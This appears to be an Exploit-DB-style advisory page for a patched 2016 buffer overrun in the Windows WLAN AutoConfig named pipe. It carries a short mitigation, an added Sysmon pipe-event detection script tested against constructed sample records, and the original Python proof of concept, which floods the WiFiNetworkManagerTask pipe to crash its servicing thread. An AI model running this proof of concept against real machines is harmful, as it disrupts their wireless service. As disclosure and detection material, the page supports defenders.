Vendor: Windows WLAN AutoConfig
By: Jeremy Brown
CVSS: 7,8 (HIGH)
Type: Buffer Overrun
CWE: 119
Product Name: Windows WLAN AutoConfig
Affected Version From: Windows 10 x86/x64 BUILD 10.0.14393
Affected Version To: Windows Server 2012 R2 x64
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10 x86/x64, Windows Server 2012 R2 x64
2016

Windows WLAN AutoConfig Named Pipe POC

This is a proof-of-concept for a buffer overrun in the Windows WLAN AutoConfig named pipe. Writing a large amount of data to the WiFiNetworkManagerTask pipe triggers a stack buffer overrun (STATUS_STACK_BUFFER_OVERRUN) in the svchost.exe process. The Wlansvc service itself is not killed, but the thread servicing the pipe terminates. According to the PoC's own notes, Windows 10 x86/x64 build 10.0.14393 is vulnerable, while Windows Server 2012 R2 x64 is not, because the service does not create the pipe there.

Mitigation:

Ensure that all Windows systems are up-to-date with the latest security patches.
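
A detection-side complement, added here as an example and not part of the original page or the PoC author's code: the PoC opens the pipe by name, which Sysmon records as event ID 18 (pipe connected), so connections to \WiFiNetworkManagerTask from images outside a baseline can be pulled from exported event XML. The baseline entry, the function names and the sample records are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PIPE_NAME = r"\WiFiNetworkManagerTask"  # pipe from the PoC, as Sysmon logs it
PIPE_CONNECTED = "18"                   # Sysmon event ID 18: pipe connected
# Assumption: lower-cased image paths taken from a baseline of your own hosts.
EXPECTED_CLIENTS = {r"c:\windows\system32\example-baseline-client.exe"}

def event_fields(xml_text):
    """Return (event_id, {Data Name: text}) for one exported event record."""
    root = ET.fromstring(xml_text)
    event_id = root.findtext("e:System/e:EventID", default="", namespaces=NS)
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id.strip(), data

def unexpected_pipe_clients(records, expected=EXPECTED_CLIENTS):
    """List pipe-connect events on PIPE_NAME whose image is not in the baseline."""
    hits = []
    for xml_text in records:
        try:
            event_id, data = event_fields(xml_text)
        except ET.ParseError:
            continue  # skip truncated or malformed records
        # Pipe names and image paths are case-insensitive on Windows.
        if (event_id != PIPE_CONNECTED
                or data.get("PipeName", "").lower() != PIPE_NAME.lower()):
            continue
        image = data.get("Image", "")
        if image.lower() not in expected:
            hits.append({"time": data.get("UtcTime", ""),
                         "pid": data.get("ProcessId", ""), "image": image})
    return hits

def _sample(event_id, pipe, image, pid):  # builds constructed records, not real logs
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f'<EventData><Data Name="UtcTime">2016-12-20 10:00:00.000</Data>'
            f'<Data Name="ProcessId">{pid}</Data><Data Name="PipeName">{pipe}</Data>'
            f'<Data Name="Image">{image}</Data></EventData></Event>')

SAMPLE_RECORDS = [
    _sample(18, r"\WiFiNetworkManagerTask", r"C:\Python27\python.exe", 4242),
    _sample(18, r"\wifinetworkmanagertask",
            r"C:\Windows\System32\example-baseline-client.exe", 900),
    _sample(18, r"\lsass", r"C:\Windows\System32\svchost.exe", 700),
    _sample(17, r"\WiFiNetworkManagerTask", r"C:\Windows\System32\svchost.exe", 800),
    "<Event><System><EventID>18</Event",  # malformed record
]

if __name__ == "__main__":
    for hit in unexpected_pipe_clients(SAMPLE_RECORDS):
        print(hit)
```

Sysmon logs pipe events only when its configuration includes PipeEvent rules, so the pipe name has to be covered there before this filter has anything to read.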

Exploit-DB raw data:

#!/usr/bin/python
# wlanautoconfig-poc.py
#
# Windows WLAN AutoConfig Named Pipe POC
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# >	wifinetworkmanager.dll!__FatalError(char const *,unsigned long,char const *, ...)
#	AsyncPipe::ReadCompletedCallback(void)
#	AsyncPipe::Dispatch(int,void *,void *, ...)
#	Synchronizer::EnqueueEvent(...)
#	AsyncPipe::ReadCompletedStatic(...)
#
# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe
#
# Tested:
#
# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)
# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)
#
# Dependencies:
#
# pip install pypiwin32
#
# Notes:
#
# This won't kill Wlansvc service, but the thread servicing the pipe will terminate
#

import win32file
import pywintypes
import msvcrt

BUF_SIZE = 4096
PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask'

def main():
    try:
        handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)
    except Exception:
        print("Error: CreateFile() failed\n")
        return

    fd = msvcrt.open_osfhandle(handle, 0)

    if(fd < 0):
        print("Error: open_osfhandle() failed\n")
        return

    buf = bytearray(b'\x42' * BUF_SIZE)

    # exact number here could vary, keeping it simple
    while True:
        win32file.WriteFile(handle, buf)


if __name__ == "__main__":
    main()